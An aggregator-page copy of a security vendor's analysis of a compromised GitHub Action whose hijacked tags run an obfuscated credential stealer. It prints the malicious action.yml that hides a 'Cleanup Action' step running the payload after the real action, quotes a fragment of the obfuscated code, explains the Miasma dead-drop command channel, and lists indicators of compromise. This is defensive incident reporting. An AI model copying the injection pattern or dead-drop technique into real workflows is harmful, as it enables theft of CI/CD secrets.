惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
V2EX
爱范儿
爱范儿
Martin Fowler
Martin Fowler
T
The Blog of Author Tim Ferriss
B
Blog RSS Feed
博客园 - 聂微东
G
GRAHAM CLULEY
Engineering at Meta
Engineering at Meta
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
WordPress大学
WordPress大学
Scott Helme
Scott Helme
AI
AI
S
Security Affairs
T
Threat Research - Cisco Blogs
M
MIT News - Artificial intelligence
T
Troy Hunt's Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
人人都是产品经理
人人都是产品经理
AWS News Blog
AWS News Blog
T
Threatpost
Cyberwarzone
Cyberwarzone
www.infosecurity-magazine.com
www.infosecurity-magazine.com
U
Unit 42
V
Vulnerabilities – Threatpost
J
Java Code Geeks
博客园 - Franky
月光博客
月光博客
Blog — PlanetScale
Blog — PlanetScale
NISL@THU
NISL@THU
D
Docker
小众软件
小众软件
N
News and Events Feed by Topic
Microsoft Security Blog
Microsoft Security Blog
Y
Y Combinator Blog
A
Arctic Wolf
D
DataBreaches.Net
云风的 BLOG
云风的 BLOG
Forbes - Security
Forbes - Security
量子位
PCI Perspectives
PCI Perspectives
美团技术团队
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
I
InfoQ
Security Archives - TechRepublic
Security Archives - TechRepublic
有赞技术团队
有赞技术团队
腾讯CDC
P
Proofpoint News Feed
S
Security @ Cisco Blogs
G
Google Developers Blog
C
Cisco Blogs

Aikido Security's Blog

GlassWorm goes native: New Zig dropper infects every IDE on your machine Aikido Attack finds multiple 0-days in Hoppscotch The cybersecurity doomerism around Mythos doesn't match what we see on the ground axios compromised on npm: maintainer account hijacked, RAT deployed Popular telnyx package compromised on PyPI by TeamPCP Aikido × Lovable: Vibe, Fix, Ship CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran TeamPCP deploys CanisterWorm on NPM following Trivy compromise Security testing is validating software that no longer exists Aikido Recognized by Frost & Sullivan with the 2026 Customer Value Leadership Award in ASPM GlassWorm Hides a RAT Inside a Malicious Chrome Extension fast-draft Open VSX Extension Compromised by BlokTrooper Glassworm Strikes Popular React Native Phone Number Packages Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Hundreds of Repositories How Security Teams Fight Back Against AI-Powered Hackers Introducing Betterleaks, an open source secrets scanner by the author of Gitleaks Trump’s 2026 cybersecurity strategy: From compliance to consequence How does AI pentesting work with compliance? What continuous pentesting actually requires Rare Not Random: Using Token Efficiency for Secrets Scanning Persistent XSS/RCE using WebSockets in Storybook’s dev server Why Determinism Is Still a Necessity in Security WAF vs. RASP vs. ADR Introducing Aikido Infinite: A new model of self-securing software How Aikido secures AI pentesting agents by design Astro Full-Read SSRF via Host Header Injection How to Get Your Board to Care About Security (Before a Breach Forces the Issue) What is Slopsquatting? The AI Package Hallucination Attack Already Happening SvelteSpill: A Cache Deception Bug in SvelteKit + Vercel Top 6 Wiz Code Alternatives Aikido recognized as Platform Leader in Latio Tech's 2026 Application Security Report From detection to prevention: How Zen stops IDOR vulnerabilities at runtime npm backdoor lets hackers hijack gambling outcomes Introducing Upgrade Impact Analysis: When breaking changes actually matter to your code Why Trying to Secure OpenClaw is Ridiculous Claude Opus 4.6 found 500 vulnerabilities. What does this change for software security? Introducing Aikido Expansion Packs: Safer defaults inside the IDE International AI Safety Report 2026: What It Means for Autonomous AI Systems Self-Securing Software: What It Is, Why It Matters, and How It Works npx Confusion: Packages That Forgot to Claim Their Own Name What Is Continuous Pentesting? Introducing Aikido Package Health: a Better Way to Trust Your Dependencies AI Pentesting: Minimum Safety Requirements for Security Testing Secure SDLC for Engineering Teams (+ Checklist) Fake Clawdbot VS Code Extension Installs ScreenConnect RAT G_Wagon: npm Package Deploys Python Stealer Targeting 100+ Crypto Wallets Gone Phishin': npm Packages Serving Custom Credential Harvesting Pages Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT Top 10 AI Security Tools For 2026 Agent Skills Are Spreading Hallucinated npx Commands Understanding Open-Source License Risk in Modern Software The CISO Vibe Coding Checklist for Security Top 6 Graphite alternatives for AI code review in 2026 From “No Bullsh*t Security” to $1B: We Just Raised Our $60m Series B Critical n8n Vulnerability Allows Unauthenticated Remote Code Execution (CVE-2026-21858) Top 14 VS Code Extensions for 2026 AI-Driven Pentesting of Coolify: Seven CVEs Identified Top Continuous Pentesting Tools in 2026 SAST vs SCA: Securing the Code You Write and the Code You Depend On JavaScript, MSBuild, and the Blockchain: Anatomy of the NeoShadow npm Supply-Chain Attack How Engineering and Security Teams Can Meet DORA’s Technical Requirements IDOR Vulnerabilities Explained: Why They Persist in Modern Applications Shai Hulud strikes again - The golden path MongoBleed: MongoDB Zlib Vulnerability (CVE-2025-14847) and How to Fix It First Sophisticated Malware Discovered on Maven Central via Typosquatting Attack on Jackson The Fork Awakens: Why GitHub’s Invisible Networks Break Package Security Top 10 Cyber Security Tools For 2026 SAST in the IDE is now free: Moving SAST to where development actually happens AI Pentesting in Action: A TL;DV Recap of Our Live Demo The Top 7 Threat Intelligence Tools in 2026 React & Next.js DoS Vulnerability (CVE-2025-55184): What You Need to Fix After React2Shell OWASP Top 10 for Agentic Applications (2026): What Developers and Security Teams Need to Know DAST vs Pentesting v AI Pentesting: Why DAST Cannot Replace Modern Pentesting PromptPwnd: Prompt Injection Vulnerabilities in GitHub Actions Using AI Agents Top 7 Cloud Security Vulnerabilities Critical React & Next.js RCE Vulnerability (CVE-2025-55182): What You Need to Fix Now How to Comply With the UK Cybersecurity & Resilience Bill: A Practical Guide for Modern Engineering Teams Shai Hulud 2.0: What the Unknown Wonderer Tells Us About the Attackers’ Endgame SCA Everywhere: Scan and Fix Open-Source Dependencies in Your IDE Safe Chain now enforces a minimum package age before install Shai Hulud Attacks Persist Through GitHub Actions Vulnerabilities Shai Hulud Launches Second Supply-Chain Attack: Zapier, ENS, AsyncAPI, PostHog, Postman Compromised CORS Security: Beyond Basic Configuration Revolut Selects Aikido Security to Power Developer-First Software Security The Future of Pentesting Is Autonomous How Aikido and Deloitte are bringing developer-first security to enterprise Secrets Detection: A Practical Guide to Finding and Preventing Leaked Credentials Invisible Unicode Malware Strikes OpenVSX, Again AI as a Power Tool: How Windsurf and Devin Are Changing Secure Coding Building Fast, Staying Secure: Supabase’s Approach to Secure-by-Default Development OWASP Top 10 2025: Official List, Changes, and What Developers Need to Know Top 10 JavaScript Security Vulnerabilities in Modern Web Apps The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties Top 7 Black Duck Alternatives in 2026 What Is IaC Security Scanning? Terraform, Kubernetes & Cloud Misconfigurations Explained AutoTriage and the Swiss Cheese Model of Security Noise Reduction Top Software Supply Chain Security Vulnerabilities Explained The Top 7 Kubernetes Security Tools Top 10 Web Application Security Vulnerabilities Every Team Should Know What Is CSPM (and CNAPP)? Cloud Security Posture Management Explained
Compromised GitHub action codfish/semantic-release-action steals CI/CD secrets
Hunter Schwartz · 2026-06-25 · via Aikido Security's Blog

On Jun 24, 2026, the codfish/semantic-release-action GitHub Action was compromised through an imposter commit attack. An attacker force-pushed two malicious commits into the repository and repointed sixteen tags to them, including the floating major version tags v2, v3, v4, and v5. Any workflow referencing the action by one of those tags will pull and run the attacker's code on its next CI run.

This action has been the standard way to wire semantic-release into GitHub Actions since 2019 and carries over 100 GitHub stars. Workflows that use it for automated releases almost always hold a GITHUB_TOKEN and frequently an NPM_TOKEN with publish access, which is exactly the kind of access an attacker wants to land inside.

How the tags were hijacked

Git tags aren't protected by default. Anyone with push access to a repository can force a tag to point at a different commit, and GitHub Actions resolves a tag reference at the moment a workflow runs. Moving a tag retroactively rewrites every future run that references it, with no signal to the person who wrote the workflow.

The attacker used this against codfish/semantic-release-action in two stages. The first malicious commit picked up fifteen tags: v2.2.1, the entire v3 line (v3, v3.0.0 through v3.5.0), the entire v4 line (v4, v4.0.0, v4.0.1), and the entire v5 line (v5, v5.0.0). A second commit is a direct child of the first and took the v2 tag. Both commits ship a byte-identical index.js payload, confirmed by hash.

Neither commit is an ancestor of the repository's main branch. They were grafted in as orphans, then dressed up to avoid suspicion in a quick git log skim. The first commit reuses the author identity, date, and commit message of a real commit from Nov 9, 2023:

commit 5792aba0e2180b9b80b77644370a6889d5817456
Author: Chris O'Donnell <1666298+codfish@users.noreply.github.com>
Date:   Thu Nov 9 16:49:48 2023 +0000

    Merge pull request #195 from codfish/force-install

That metadata is real, lifted from a legitimate merge in the project's history. However, the file contents were swapped out for the malicious payload.

What changed in action.yml

codfish/semantic-release-action originally ran as a Docker-based action, building a container from the repository's Dockerfile and invoking entrypoint.js. The malicious commits replace action.yml with a composite action instead:

runs:
  using: composite
  steps:
    - uses: "codfish/semantic-release-action@8f9a58f2acdc190c356f79159b5de2548cdb63cd"
      with:
        branches: "${{ inputs.branches }}"
        # ...remaining inputs passed through unchanged
    - uses: "oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6"
      if: always()
    - name: Cleanup Action
      if: always()
      shell: bash
      run: bun run $GITHUB_ACTION_PATH/index.js

The first step still calls the real, current codfish/semantic-release-action, pinned to a clean commit, so the action keeps functioning normally, and a workflow run looks successful. The two steps after it run with if: always(), so they fire whether the legitimate step succeeds, fails, or gets skipped. The second step pulls in oven-sh/setup-bun, a real and otherwise unrelated third-party action, purely to get the Bun runtime onto the CI runner. The third step executes the payload, index.js, with bun run.

The repository's original Dockerfile, entrypoint.js, and entrypoint.spec.js are still sitting in the tree at this commit. They are simply never invoked anymore, since a composite action ignores them entirely. Leaving the old files in place is a minimal diff cover. Anyone skimming a file listing sees the action's usual contents and nothing obviously missing.

The payload

The injected index.js is 781,580 bytes of obfuscated JavaScript, structured as a string array with hex coded variable names, the output style of a typical commercial JavaScript obfuscator:

const _0x307419=_0x42e6;(function(_0xb5d033,_0x1d1124){const _0x23f080={_0x15a6a0:0xf9,_0x3d6efe:0x73a,...

Buried in the obfuscated body is the string thebeautifulsnadsoftime, a near match for TheBeautifulSandsOfTime and off by a single transposed letter. That string identifies one of the dead drop channels used by the Miasma credential stealing toolkit, leaked publicly on Jun 10, 2026. Miasma's design avoids a traditional C2 server. Instead of calling out to attacker infrastructure, the malware periodically searches GitHub's public commit search API for that marker string. When it finds a matching commit, it treats the attached payload as a signed command and runs it through eval(). That gives the operator a way to deliver fresh remote code execution to every infected runner without standing up or maintaining infrastructure of their own, and without generating the outbound network traffic that egress monitoring usually flags.

Connection to the Miasma campaign

The same TheBeautifulSandsOfTime marker already shows up in Miasma campaign activity against npm packages under the @redhat-cloud-services scope, and in several other compromised GitHub repositories tied to the same toolkit leak. Once a credential stealing framework like this goes public, it tends to spread quickly, since any operator can run it without writing their own tooling. codfish/semantic-release-action fits that pattern, another instance of the same toolkit reaching a new repository.

How Aikido detects this

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

For broader coverage across your whole team, Aikido's Device Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.

For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.

Indicators of compromise

Malicious commits

  • 5792aba0e2180b9b80b77644370a6889d5817456 (tags v2.2.1, v3, v3.0.0 through v3.5.0, v4, v4.0.0, v4.0.1, v5, v5.0.0)
  • bcb6b1d409144318e8fad2171d6fe06d02299d1a (tag v2)

Payload hash

index.js (both malicious commits): sha256 9f93d77d32833a515bc406c46da477142bb1ac2babeecb6aa42f98669a6db015

Other indicators

  • Dead drop marker string: thebeautifulsnadsoftime
  • Bun runtime pulled in via oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6

Affected tags

  • codfish/semantic-release-action@v2
  • codfish/semantic-release-action@v2.2.1
  • codfish/semantic-release-action@v3 through v3.5.0
  • codfish/semantic-release-action@v4, v4.0.0, v4.0.1
  • codfish/semantic-release-action@v5, v5.0.0

Confirmed clean

  • codfish/semantic-release-action@v1.0.0 through v1.10.0
  • codfish/semantic-release-action@v2.0.0